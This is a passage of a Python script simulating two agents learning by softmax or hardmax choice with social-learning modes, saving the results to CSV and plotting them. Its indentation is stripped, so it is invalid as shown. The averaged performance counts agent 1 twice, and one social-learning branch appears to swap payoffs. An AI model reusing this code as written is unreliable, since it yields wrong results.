maxcheck = attraction.max(axis=0)
mincheck = attraction.min(axis=0)
if maxcheck == mincheck:
choice = random.randint(0, M - 1)
else:
choice = attraction.argmax(axis=0)
return choice
def softmax(attraction, t, M, tau): # softmax action selection
prob = np.zeros((1, M))
denom = 0
i = 0
while i < M:
denom = denom + math.exp((attraction[i]) / tau)
i = i + 1
roulette = random.random()
i = 0
p = 0
while i < M:
prob[0][i] = math.exp(attraction[i] / tau) / denom
p = p + prob[0][i]
if p > roulette:
choice = i
return choice
break # stops computing probability of action selection as soon as cumulative probability exceeds roulette
i = i + 1
# Time varying model objects
attraction1 = np.zeros(M)
attraction2 = np.zeros(M)
attractionlag1 = np.zeros(M)
attractionlag2 = np.zeros(M)
# To keep track of c(c)ount of # times action selected for bayesian updating
count1 = np.zeros(M)
count2 = np.zeros(M)
# SIMULTAION IS RUN HERE
for a in range(sampleSize):
reality = genEnvironment(M)
attraction1 = genPriors(M)
attraction2 = genPriors(M)
count1 = np.ones(M)
count2 = np.ones(M)
bestchoice = getBest(reality)
pchoice1 = -1
pchoice2 = -1
for t in range(T):
if choiceRule == 0:
choice1 = hardmax(attraction1, t, M)
elif choiceRule == 1:
choice1 = softmax(attraction1, t, M, tau)
elif choiceRule == 2:
if t < 2:
tau = 1
else:
tau = 1 - avg_agent_perf1[t-1, a]
if tau <= 0.01:
choice1 = hardmax(attraction1, t, M)
else:
choice1 = softmax(attraction1, t, M, tau)
if choiceRule == 0:
choice2 = hardmax(attraction2, t, M)
elif choiceRule == 1:
choice2 = softmax(attraction2, t, M, tau)
elif choiceRule == 2:
if t < 2:
tau = 1
else:
tau = 1 - avg_agent_perf2[t-1, a]
if tau <= 0.01:
choice2 = hardmax(attraction2, t, M)
else:
choice2 = softmax(attraction2, t, M, tau)
payoff1 = reality[choice1] + noise * (0.5 - random.random())
payoff2 = reality[choice2] + noise * (0.5 - random.random())
avg_agent_perf1[t][a] = payoff1
avg_agent_perf2[t][a] = payoff2
if choice1 == bestchoice:
correct_choice1[t][a] = 1
if choice2 == bestchoice:
correct_choice2[t][a] = 1
if (choice1 == bestchoice) & (choice2 == bestchoice):
both_correct[t][a] = 1
biased_beliefs1[t][a] = dissimilarity(reality, attraction1)
biased_beliefs2[t][a] = dissimilarity(reality, attraction2)
if choice1 != pchoice1:
switching_behavior1[t][a] = 1
if choice2 != pchoice2:
switching_behavior2[t][a] = 1
if choice1 == choice2:
convergence[t][a] = 1
pchoice1 = choice1
pchoice2 = choice2
if socialLearning == 0:
count1[choice1] += 1
count2[choice2] += 1
if updateRule == 0:
attraction1[choice1] = (count1[choice1] - 1) / count1[choice1] * attraction1[choice1] + 1 / count1[choice1] * payoff1
attraction2[choice2] = (count2[choice2] - 1) / count2[choice2] * attraction2[choice2] + 1 / count2[choice2] * payoff2
elif updateRule == 1:
attraction1[choice1] = (1 - phi) * attraction1[choice1] + phi*payoff1
attraction2[choice2] = (1 - phi) * attraction2[choice2] + phi * payoff2
elif socialLearning == 1:
count1[choice1] += 1
count2[choice2] += 1
if updateRule == 0:
attraction1[choice1] = (count1[choice1] - 1) / count1[choice1] * attraction1[choice1] + 1 / count1[choice1] * payoff1
attraction2[choice2] = (count2[choice2] - 1) / count2[choice2] * attraction2[choice2] + 1 / count2[choice2] * payoff2
count2[choice1] += 1
count1[choice2] += 1
attraction2[choice1] = (count2[choice1] - 1) / count2[choice1] * attraction2[choice1] + 1 / count2[choice1] * payoff1
attraction1[choice2] = (count1[choice2] - 1) / count1[choice2] * attraction1[choice2] + 1 / count1[choice2] * payoff2
elif updateRule == 1:
attraction1[choice1] = (1 - phi) * attraction1[choice1] + phi * payoff1
attraction2[choice2] = (1 - phi) * attraction2[choice2] + phi * payoff2
count1[choice1] += 1
count2[choice2] += 1
attraction2[choice1] = (1 - phi) * attraction2[choice1] + phi * payoff2
attraction1[choice2] = (1 - phi) * attraction1[choice2] + phi * payoff1
elif socialLearning == 2:
count1[choice1] += 1
count2[choice2] += 1
if updateRule == 0:
attraction1[choice1] = (count1[choice1] - 1) / count1[choice1] * attraction1[choice1] + 1 / count1[choice1] * payoff1
attraction2[choice2] = (count2[choice2] - 1) / count2[choice2] * attraction2[choice2] + 1 / count2[choice2] * payoff2
elif updateRule == 1:
attraction1[choice1] = (1 - phi) * attraction1[choice1] + phi * payoff1
attraction2[choice2] = (1 - phi) * attraction2[choice2] + phi * payoff2
attractionlag1 = np.copy(attraction1)
attractionlag2 = np.copy(attraction2)
attraction1 = np.add(attractionlag1, attractionlag2)/2
attraction2 = np.add(attractionlag1, attractionlag2)/2
result_org = np.zeros((T, 11))
for t in range(T): # Compiling final output
result_org[t, 0] = t + 1
result_org[t, 1] = float(np.sum(avg_agent_perf1[t, :])) / sampleSize
result_org[t, 2] = float(np.sum(avg_agent_perf2[t, :])) / sampleSize
result_org[t, 3] = float(np.sum(correct_choice1[t, :])) / sampleSize
result_org[t, 4] = float(np.sum(correct_choice2[t, :])) / sampleSize
result_org[t, 5] = float(np.sum(both_correct[t, :])) / sampleSize
result_org[t, 6] = float(np.sum(biased_beliefs1[t, :])) / sampleSize
result_org[t, 7] = float(np.sum(biased_beliefs2[t, :])) / sampleSize
result_org[t, 8] = float(np.sum(switching_behavior1[t, :])) / sampleSize
result_org[t, 9] = float(np.sum(switching_behavior2[t, :])) / sampleSize
result_org[t, 10] = float(np.sum(convergence[t, :])) / sampleSize
# WRITING RESULTS TO CSV FILE
filename = ("Social learning" + " (mode = " + str(socialLearning) +"; choice rule = "+ str(choiceRule)+"; updating rule = "+ str(updateRule)+ ').csv')
with open(filename, 'w', newline='') as f:
thewriter = csv.writer(f)
thewriter.writerow(
['Period', 'Perf1', 'Perf2', 'Prop(the optimal choice, agent 1)', 'Prop(the optimal choice, agent 2)', 'Prop(the optimal choice, both agents)', 'Dist(beliefs and reality, agent1)','Dist(beliefs and reality, agent2)', 'Switching1', 'Switching2', 'Convergence of action'])
for values in result_org:
thewriter.writerow(values)
f.close()
##PRINTING END RUN RESULTS
print("Final performance " + str((result_org[T - 1, 1]+result_org[T - 1, 1])/2))
print("Final proportion of the optimal choice " + str(result_org[T - 1, 5]))
#
##GRAPHICAL OUTPUT
plt.style.use('ggplot') # Setting the plotting style
fig = plt.figure(figsize=(8.27, 11.69), dpi=100)
ax1 = plt.subplot2grid((6, 5), (4, 1), colspan=3)
ax1.plot(result_org[:, 0], (result_org[:, 1]+result_org[:, 1])/2, color='black', linestyle='--', label='Average Performance')
ax1.plot(result_org[:, 0], result_org[:, 5], color='blue', linestyle='--', label='Probability that both agents choose the optimal action')
ax1.plot(result_org[:, 0], result_org[:, 10], color='black', linestyle='--', label='Convergence in action')
ax1.set_xlabel('t', fontsize=12)
ax1.legend(bbox_to_anchor=(0., -0.8, 1., .102), loc=3,
ncol=2, mode="expand", borderaxespad=0., fontsize=9)
ENDINGTIME = datetime.datetime.now().replace(microsecond=0)
TIMEDIFFERENCE = ENDINGTIME - STARTINGTIME
# print 'Computation time:', TIMEDIFFERENCE
| [
"noreply@github.com"
] | noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.